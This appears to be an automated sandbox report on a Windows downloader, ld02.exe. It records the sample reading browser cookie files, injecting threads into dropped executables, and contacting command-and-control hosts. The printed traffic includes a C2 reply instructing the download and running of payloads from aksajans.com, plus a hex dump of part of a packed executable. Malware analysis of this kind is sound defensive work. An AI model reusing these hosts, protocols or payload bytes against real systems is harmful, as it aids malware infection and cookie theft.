HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000005  PackedCatalogItem  %SystemRoot%\​system32\​rsvpsp.d 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000006  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000007  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000008  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000009  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000010  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000011  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​Setup  SystemSetupInProgress 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Environment  TEMP  %USERPROFILE%\​Local Settings\​Temp 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Environment  TMP  %USERPROFILE%\​Local Settings\​Temp 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  CertificateRevocation 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  DisableCachingOfSSLPages 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  EnableHttp1_1 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  EnableNegotiate 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  MimeExclusionListForCache  multipart/mixed multipart/x-mixed-replace multipart/x-byteranges  
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  SecureProtocols  160 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  WarnOnPost  0x01000000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  WarnOnZoneCrossing 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows NT\​CurrentVersion\​Winlogon  ParseAutoexec 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cache  C:\​Documents and Settings\​user\​Local Settings\​Temporary Internet Files 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  AppData  %USERPROFILE%\​Application Data 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Cache  %USERPROFILE%\​Local Settings\​Temporary Internet Files 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Cookies  %USERPROFILE%\​Cookies 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  History  %USERPROFILE%\​Local Settings\​History 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Local Settings  %USERPROFILE%\​Local Settings 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Personal  %USERPROFILE%\​My Documents 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache  Signature  Client UrlCache MMF Ver 5.2 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Content  CacheLimit  163410 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Content  CachePrefix   
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Cookies  CacheLimit  8192 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Cookies  CachePrefix  Cookie: 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​MSHist012008051620080517  CacheLimit  8192 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​MSHist012008051620080517  CacheOptions  11 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​MSHist012008051620080517  CachePath  %USERPROFILE%\​Local Settings\​History\​History.IE5\​MSHist012008051620080517 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​MSHist012008051620080517  CachePrefix  :2008051620080517:  
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​MSHist012008051620080517  CacheRepair 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​UserData  CacheLimit  1000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​UserData  CacheOptions 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​UserData  CachePath  %USERPROFILE%\​UserData 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​UserData  CachePrefix  UserData 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​UserData  CacheRepair 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​feedplat  CacheLimit  8192 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​feedplat  CacheOptions 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​feedplat  CachePath  %USERPROFILE%\​Local Settings\​Application Data\​Microsoft\​Feeds Cache 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​feedplat  CachePrefix  feedplat: 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​feedplat  CacheRepair 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​History  CacheLimit  8192 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​History  CachePrefix  Visited: 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings  MigrateProxy 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings  ProxyEnable 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings\​Connections  DefaultConnectionSettings  0x3c0000000200000001000000000000000000000000000000040000000000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings\​Connections  SavedLegacySettings  0x460000006700000001000000000000000000000000000000040000000000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  APPDATA  C:\​Documents and Settings\​user\​Application Data 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  CLIENTNAME   
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  HOMEDRIVE  C: 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  HOMEPATH  \​Documents and Settings\​user 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  HOMESHARE   
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  LOGONSERVER  \​\​USER 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  SESSIONNAME  Console 

  - Monitored Registry Keys:  
Key Name Watch subtree Notify Filter Count
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  Attributes Change,Value Change,Security Descriptor Change 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5  Key Change 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9  Key Change 

3.b) ld02.exe - File Activities

  - Files Created:  
C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198010.exe
C:\WINDOWS\tt_1211198012.exe
c:\windows\t55ft3366f44.dat

  - Files Read:  
C:\Documents and Settings\user\Cookies\user@2o7[1].txt
C:\Documents and Settings\user\Cookies\user@ad.yieldmanager[2].txt
C:\Documents and Settings\user\Cookies\user@adobe[1].txt
C:\Documents and Settings\user\Cookies\user@adopt.euroclick[1].txt
C:\Documents and Settings\user\Cookies\user@adopt.specificclick[1].txt
C:\Documents and Settings\user\Cookies\user@adrevolver[2].txt
C:\Documents and Settings\user\Cookies\user@ads.revsci[1].txt
C:\Documents and Settings\user\Cookies\user@advertising[2].txt
C:\Documents and Settings\user\Cookies\user@amazon[2].txt
C:\Documents and Settings\user\Cookies\user@apmebf[2].txt
C:\Documents and Settings\user\Cookies\user@ar.voicefive[1].txt
C:\Documents and Settings\user\Cookies\user@atdmt[2].txt
C:\Documents and Settings\user\Cookies\user@atwola[1].txt
C:\Documents and Settings\user\Cookies\user@burstnet[1].txt
C:\Documents and Settings\user\Cookies\user@c.msn[2].txt
C:\Documents and Settings\user\Cookies\user@c1.microsoft[1].txt
C:\Documents and Settings\user\Cookies\user@casalemedia[2].txt
C:\Documents and Settings\user\Cookies\user@com[1].txt
C:\Documents and Settings\user\Cookies\user@contextweb[1].txt
C:\Documents and Settings\user\Cookies\user@doubleclick[1].txt
C:\Documents and Settings\user\Cookies\user@download[2].txt
C:\Documents and Settings\user\Cookies\user@ehg-verizon.hitbox[2].txt
C:\Documents and Settings\user\Cookies\user@fastclick[2].txt
C:\Documents and Settings\user\Cookies\user@google[1].txt
C:\Documents and Settings\user\Cookies\user@google[2].txt
C:\Documents and Settings\user\Cookies\user@hitbox[2].txt
C:\Documents and Settings\user\Cookies\user@icq[1].txt
C:\Documents and Settings\user\Cookies\user@iseclab[1].txt
C:\Documents and Settings\user\Cookies\user@live365[1].txt
C:\Documents and Settings\user\Cookies\user@live[1].txt
C:\Documents and Settings\user\Cookies\user@m.webtrends[2].txt
C:\Documents and Settings\user\Cookies\user@media.adrevolver[1].txt
C:\Documents and Settings\user\Cookies\user@mediaplex[1].txt
C:\Documents and Settings\user\Cookies\user@microsoft[2].txt
C:\Documents and Settings\user\Cookies\user@microsoftwga.112.2o7[1].txt
C:\Documents and Settings\user\Cookies\user@msn[1].txt
C:\Documents and Settings\user\Cookies\user@msnportal.112.2o7[1].txt
C:\Documents and Settings\user\Cookies\user@news[1].txt
C:\Documents and Settings\user\Cookies\user@onlinestores.metaservices.microsoft[1].txt
C:\Documents and Settings\user\Cookies\user@planetpdf[1].txt
C:\Documents and Settings\user\Cookies\user@questionmarket[2].txt
C:\Documents and Settings\user\Cookies\user@rad.msn[2].txt
C:\Documents and Settings\user\Cookies\user@realmedia[1].txt
C:\Documents and Settings\user\Cookies\user@revsci[2].txt
C:\Documents and Settings\user\Cookies\user@search.live[2].txt
C:\Documents and Settings\user\Cookies\user@search.microsoft[1].txt
C:\Documents and Settings\user\Cookies\user@support.microsoft[1].txt
C:\Documents and Settings\user\Cookies\user@symantec[2].txt
C:\Documents and Settings\user\Cookies\user@tacoda[1].txt
C:\Documents and Settings\user\Cookies\user@tribalfusion[1].txt
C:\Documents and Settings\user\Cookies\user@update.microsoft[1].txt
C:\Documents and Settings\user\Cookies\user@verizon[1].txt
C:\Documents and Settings\user\Cookies\user@voicefive[1].txt
C:\Documents and Settings\user\Cookies\user@westernunion[2].txt
C:\Documents and Settings\user\Cookies\user@www.microsoft[2].txt
C:\Documents and Settings\user\Cookies\user@www.msn[2].txt
C:\Documents and Settings\user\Cookies\user@www22.verizon[1].txt
C:\Documents and Settings\user\Cookies\user@zedo[1].txt
PIPE\lsarpc
c:\autoexec.bat

  - Files Modified:  
C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198010.exeinfo
C:\WINDOWS\tt_1211198012.exeinfo
PIPE\lsarpcinfo
WMIDataDeviceinfo
\Device\Afd\Endpointinfo
\Device\RasAcdinfo
c:\windows\t55ft3366f44.datinfo

  - File System Control Communication:  
File Control Code Times
PIPE\lsarpc  0x0011C017  22 

  - Device Control Communication:  
File Control Code Times
unnamed file  0x00390008 
WMIDataDevice  0x0022414C 
WMIDataDevice  0x00228144 
\Device\RasAcd  0x00F14014 
\Device\Afd\Endpoint  AFD_GET_INFO (0x0001207B) 
\Device\Afd\Endpoint  AFD_SET_CONTEXT (0x00012047)  15 
\Device\Afd\Endpoint  AFD_BIND (0x00012003) 
\Device\Afd\Endpoint  AFD_GET_TDI_HANDLES (0x00012037)  10 
\Device\Afd\Endpoint  AFD_CONNECT (0x00012007) 
\Device\Afd\Endpoint  AFD_SEND (0x0001201F) 
\Device\Afd\Endpoint  AFD_RECV (0x00012017)  39 

  - Memory Mapped Files:  
File Name
C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198010.exe
C:\WINDOWS\System32\mswsock.dll
C:\WINDOWS\System32\winrnr.dll
C:\WINDOWS\System32\wshtcpip.dll
C:\WINDOWS\system32\Apphelp.dll
C:\WINDOWS\system32\DNSAPI.dll
C:\WINDOWS\system32\MSCTF.dll
C:\WINDOWS\system32\RASAPI32.dll
C:\WINDOWS\system32\TAPI32.dll
C:\WINDOWS\system32\WINMM.dll
C:\WINDOWS\system32\hnetcfg.dll
C:\WINDOWS\system32\rasadhlp.dll
C:\WINDOWS\system32\rasman.dll
C:\WINDOWS\system32\rpcss.dll
C:\WINDOWS\system32\rtutils.dll
C:\WINDOWS\system32\sensapi.dll
C:\WINDOWS\tt_1211198012.exe
C:\Windows\AppPatch\sysmain.sdb

3.c) ld02.exe - Windows Service Activities

  - Services Started:  
RASMAN

3.d) ld02.exe - Process Activities

  - Processes Created:  
Executable Command Line
C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198010.exe   
  C:\DOCUME~1\user\LOCALS~1\Temp\\jopaxx_1211198010.exe 
C:\WINDOWS\tt_1211198012.exe   
  C:\WINDOWS\tt_1211198012.exe 

  - Remote Threads Created:  
Affected Process
C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198010.exe
C:\WINDOWS\tt_1211198012.exe

  - Thread Overview:  
Time Number of threads
After 106 seconds

  - Foreign Memory Regions Read:  
Process: C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198010.exe
Process: C:\WINDOWS\tt_1211198012.exe

  - Foreign Memory Regions Written:  
Process: C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198010.exe
Process: C:\WINDOWS\tt_1211198012.exe

3.e) ld02.exe - Network Activity

  - DNS Queries:  
Name Query Type Query Result Successful Protocol
www.google.com  DNS_TYPE_A     
onames0603.com  DNS_TYPE_A  58.241.255.37   
aksajans.com  DNS_TYPE_A  212.58.23.82   

  -  HTTP Conversations:  
From ANUBIS:1032 to 74.125.43.147:80 - [www.google.com]
Request: GET /
Response: 302 "Found"
From ANUBIS:1033 to 58.241.255.37:80 - [onames0603.com]
Request: POST /achcheck.php
Response: 200 "OK"
Request: POST /ld/gen.php
Response: 200 "OK"
From ANUBIS:1035 to 212.58.23.82:80 - [aksajans.com]
Request: GET /gif/websrvx.exe
Response: 200 "OK"
Request: GET /gif/nfr.exe
Response: 200 "OK"

  -  Unknown TCP Traffic:  
from ANUBIS:1034 to 58.241.255.37:80
State: Normal establishment and termination - Transferred outbound Bytes: 380 - Transferred inbound Bytes: 290
Data sent: 
    
504f 5354 202f 6c64 2f67 656e 2e70 6870    POST /ld/gen.php
2048 5454 502f 312e 310d 0a48 6f73 743a     HTTP/1.1..Host:
206f 6e61 6d65 7330 3630 332e 636f 6d0d     onames0603.com.
0a55 7365 722d 4167 656e 743a 204d 6f7a    .User-Agent: Moz
696c 6c61 2f34 2e30 2028 636f 6d70 6174    illa/4.0 (compat
6962 6c65 3b20 4d53 4945 2037 2e30 3b20    ible; MSIE 7.0; 
5769 6e64 6f77 7320 4e54 2035 2e31 3b20    Windows NT 5.1; 
2e4e 4554 2043 4c52 2032 2e30 2e35 3037    .NET CLR 2.0.507
3237 3b20 2e4e 4554 2043 4c52 2033 2e30    27; .NET CLR 3.0
2e34 3530 362e 3231 3532 3b20 2e4e 4554    .4506.2152; .NET
2043 4c52 2033 2e35 2e33 3037 3239 290d     CLR 3.5.30729).
0a43 6f6e 7465 6e74 2d74 7970 653a 2061    .Content-type: a
7070 6c69 6361 7469 6f6e 2f78 2d77 7777    pplication/x-www
2d66 6f72 6d2d 7572 6c65 6e63 6f64 6564    -form-urlencoded
0d0a 436f 6e6e 6563 7469 6f6e 3a20 636c    ..Connection: cl
6f73 650d 0a43 6f6e 7465 6e74 2d4c 656e    ose..Content-Len
6774 683a 2031 3132 0d0a 0d0a              gth: 112....
Data sent: 
    
663d 3026 613d 3138 3234 3234 3530 3030    f=0&a=1824245000
2676 3d30 3226 633d 3026 733d 6c64 266c    &v=02&c=0&s=ld&l
3d31 3030 3026 636b 3d30 2663 5f66 623d    =1000&ck=0&c_fb=
3026 635f 6d73 3d30 2663 5f68 693d 3026    0&c_ms=0&c_hi=0&
635f 6265 3d30 2663 5f66 723d 3026 635f    c_be=0&c_fr=0&c_
7962 3d30 2663 5f74 673d 3026 635f 6e6c    yb=0&c_tg=0&c_nl
3d30 2663 5f66 753d 3026 635f 6c6a 3d30
Data received: 
    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a32 343a 3131    ar 2009 11:24:11
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e33 2028 4365 6e74    ache/2.2.3 (Cent
4f53 290d 0a58 2d50 6f77 6572 6564 2d42    OS)..X-Powered-B
793a 2050 4850 2f35 2e31 2e36 0d0a 436f    y: PHP/5.1.6..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3131    ntent-Length: 11
330d 0a43 6f6e 6e65 6374 696f 6e3a 2063    3..Connection: c
6c6f 7365 0d0a 436f 6e74 656e 742d 5479    lose..Content-Ty
7065 3a20 7465 7874 2f68 746d 6c0d 0a0d    pe: text/html...
0a23 5049 443d 3130 3030 0a53 5441 5254    .#PID=1000.START
4f4e 4345 7c68 7474 703a 2f2f 616b 7361    ONCE|http://aksa
6a61 6e73 2e63 6f6d 2f67 6966 2f77 6562    jans.com/gif/web
7372 7678 2e65 7865 0a53 5441 5254 7c68    srvx.exe.START|h
7474 703a 2f2f 616b 7361 6a61 6e73 2e63    ttp://aksajans.c
6f6d 2f67 6966 2f6e 6672 2e65 7865 0a23    om/gif/nfr.exe.#
424c 4143 4b4c 4142 454c 0d0a 4558 4954    BLACKLABEL..EXIT
0d0a                                       ..
from ANUBIS:1036 to 212.58.23.82:80
State: Normal establishment and termination - Transferred outbound Bytes: 245 - Transferred inbound Bytes: 18684
Data sent: 
    
4745 5420 2f67 6966 2f6e 6672 2e65 7865    GET /gif/nfr.exe
2048 5454 502f 312e 310d 0a48 6f73 743a     HTTP/1.1..Host:
2061 6b73 616a 616e 732e 636f 6d0d 0a55     aksajans.com..U
7365 722d 4167 656e 743a 204d 6f7a 696c    ser-Agent: Mozil
6c61 2f34 2e30 2028 636f 6d70 6174 6962    la/4.0 (compatib
6c65 3b20 4d53 4945 2037 2e30 3b20 5769    le; MSIE 7.0; Wi
6e64 6f77 7320 4e54 2035 2e31 3b20 2e4e    ndows NT 5.1; .N
4554 2043 4c52 2032 2e30 2e35 3037 3237    ET CLR 2.0.50727
3b20 2e4e 4554 2043 4c52 2033 2e30 2e34    ; .NET CLR 3.0.4
3530 362e 3231 3532 3b20 2e4e 4554 2043    506.2152; .NET C
4c52 2033 2e35 2e33 3037 3239 290d 0a43    LR 3.5.30729)..C
6f6e 7465 6e74 2d74 7970 653a 2061 7070    ontent-type: app
6c69 6361 7469 6f6e 2f78 2d77 7777 2d66    lication/x-www-f
6f72 6d2d 7572 6c65 6e63 6f64 6564 0d0a    orm-urlencoded..
436f 6e6e 6563 7469 6f6e 3a20 636c 6f73    Connection: clos
650d 0a0d 0a                               e....
Data received: 
    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a34 313a 3331    ar 2009 11:41:31
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 0d0a 4c61 7374 2d4d 6f64 6966    ache..Last-Modif
6965 643a 2054 6875 2c20 3139 204d 6172    ied: Thu, 19 Mar
2032 3030 3920 3134 3a33 313a 3139 2047     2009 14:31:19 G
4d54 0d0a 4554 6167 3a20 2233 3161 3163    MT..ETag: "31a1c
352d 3438 3030 2d61 3734 6166 6263 3022    5-4800-a74afbc0"
0d0a 4163 6365 7074 2d52 616e 6765 733a    ..Accept-Ranges:
2062 7974 6573 0d0a 436f 6e74 656e 742d     bytes..Content-
4c65 6e67 7468 3a20 3138 3433 320d 0a43    Length: 18432..C
6f6e 6e65 6374 696f 6e3a 2063 6c6f 7365    onnection: close
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
6170 706c 6963 6174 696f 6e2f 6f63 7465    application/octe
742d 7374 7265 616d 0d0a 0d0a 4d5a 9000    t-stream....MZ..
0300 0000 0400 0000 ffff 0000 b800 0000    ................
0000 0000 4000 0000 0000 0000 0000 0000    ....@...........
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 e800 0000 0e1f ba0e    ................
00b4 09cd 21b8 014c cd21 5468 6973 2070    ....!..L.!This p
726f 6772 616d 2063 616e 6e6f 7420 6265    rogram cannot be
2072 756e 2069 6e20 444f 5320 6d6f 6465     run in DOS mode
2e0d 0d0a 2400 0000 0000 0000 a7ee 108f    ....$...........
e38f 7edc e38f 7edc e38f 7edc 9893 72dc    ..~...~...~...r.
e08f 7edc 0b90 74dc e88f 7edc 6093 70dc    ..~...t...~.`.p.
e18f 7edc 0b90 7adc e18f 7edc 8190 6ddc    ..~...z...~...m.
e68f 7edc e38f 7fdc d18f 7edc d5a9 75dc    ..~.......~...u.
e28f 7edc 2489 78dc e28f 7edc 5269 6368    ..~.$.x...~.Rich
e38f 7edc 0000 0000 0000 0000 0000 0000    ..~.............
0000 0000 5045 0000 4c01 0300 5b4b c249    ....PE..L...[K.I
0000 0000 0000 0000 e000 0f01 0b01 0600    ................
0050 0000 0010 0000 0050 0000 109f 0000    .P.......P......
0060 0000 00b0 0000 0000 4000 0010 0000    .`........@.....
0002 0000 0400 0000 0000 0000 0400 0000    ................
0000 0000 00c0 0000 0010 0000 0000 0000    ................
0200 0000 0000 1000 0010 0000 0000 1000    ................
0010 0000 0000 0000 1000 0000 0000 0000    ................
0000 0000 60b0 0000 0c01 0000 00b0 0000    ....`...........
6000 0000 0000 0000 0000 0000 0000 0000    `...............
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 5550 5830    ............UPX0
0000 0000 0050 0000 0010 0000 0000 0000    .....P..........
0004 0000 0000 0000 0000 0000 0000 0000    ................
8000 00e0 5550 5831 0000 0000 0050 0000    ....UPX1.....P..
0060 0000 0042 0000 0004 0000 0000 0000    .`...B..........
0000 0000 0000 0000 4000 00e0 2e72 7372    ........@....rsr
6300 0000 0010 0000 00b0 0000 0002 0000    c...............
0046 0000 0000 0000 0000 0000 0000 0000    .F..............
4000 00c0 0000 0000 0000 0000 0000 0000    @...............
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0033 2e30 3200 5550 5821    .......3.02.UPX!
0d09 020a b692 9f3c 404b 35d3 1974 0000    .......<@K5..t..
0c3f 0000 0058 0000 0000 0021 ffff edff    .?...X.....!....
558b ecb8 e423 0000 e8a3 0a04 8065 ff00    U....#.......e..
56ff 7508 8b35 6420 4000 8d85 2ddd dffe    V.u..5d @...-...
1cdc ffff 6828 310a 50ff d683 c40c 10fc    ....h(1.P.......
50ed 7f77 9b17 1215 2424 83f8 ff89 45e8    P..w....$$....E.
0f84 6503 3e36 fb6e f753 5768 242c 6820    ..e.>6.n.SWh$,h 
048d 45b4 6814 394d 1964 d9cc 203f 1048    ..E.h.9M.d.. ?.H
ecd6 bdb1 5d66 680c 2015 6c2f 501f ddfe    ....]fh. .l/P...
b16e 1050 2f18 85c0 0f85 a602 5733 ffba    .n.P/.......W3..
f66d 9b32 5e80 0c00 6a03 5708 0780 decc    .m.2^...j.W.....
bfe9 281c 8bd8 83fb ff0f 84ca 44ec 5053    ..(.........D.PS
fbcf bfd9 1518 3bc7 8945 f00f 865e 7801    ......;..E...^x.
57e8 b609                                  W...
Data received: 
    
08fb 7ffb 6d59 12f8 8bcf 8b7d 04d1 33c0    ....mY.....}..3.
c1e9 02f3 ab8b ca6a 68e9 b6ed 7de1 03f3    .......jh...}...
aa39 91f0 02f8 3f14 6fd3 999d 7b84 180e    .9....?.o...{...
1068 08d8 d37d be9b 048b 3d64 0f00 fc30    .h...}....=d...0
04f8 361f 3ecf f4f0 e830 395c fdc0 30ef    ..6.>....09\..0.
cb6d 79d7 2810 24fe 6a47 68b8 229e e779    .my.(.$.jGh."..y
beb4 04b0 aca8 a09c 6639 ec79 9874 3a2c    ........f9.y.t:,
eccf f33c df68 7038 6c68 6460 5cb7 c9f3    ...<.hp8lhd`\...
3c58 5430 a55c 2076 fbba 6187 d8f8 4a30    <XT0.\ v..a...J0
d374 2d89 61ef ed6c 1259 1059 741b 6011    .t-.a..l.Y.Yt.`.
